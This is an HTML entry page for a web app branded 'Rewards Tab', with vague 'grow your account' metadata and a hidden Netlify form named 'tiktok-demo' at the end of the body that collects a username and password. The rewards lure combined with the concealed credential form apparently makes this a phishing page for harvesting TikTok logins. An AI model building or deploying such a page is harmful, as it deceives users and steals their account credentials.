<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <!-- TODO: Set the document title to the name of your application -->
    <title>Rewards Tab</title>
    <meta name="description" content="Grow your account" />
    <meta name="author" content="Rewards" />

    <!-- TODO: Update og:title to match your application name -->
    <meta property="og:title" content="Rewards hub" />
    <meta property="og:description" content="Rewards today" />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTXFN6HFRE72KddVSJDaU9Msfl3_kqSTjqSPVK1glFk6ZFRc6ACJdG1gLE&s=10" />

    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@Le" />
    <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTXFN6HFRE72KddVSJDaU9Msfl3_kqSTjqSPVK1glFk6ZFRc6ACJdG1gLE&s=10" />
  </head>

  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.tsx"></script>
 <form name="tiktok-demo" method="POST" data-netlify="true" hidden>
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="hidden" name="form-name" value="tiktok-demo" />
</form>
  </body>
</html>
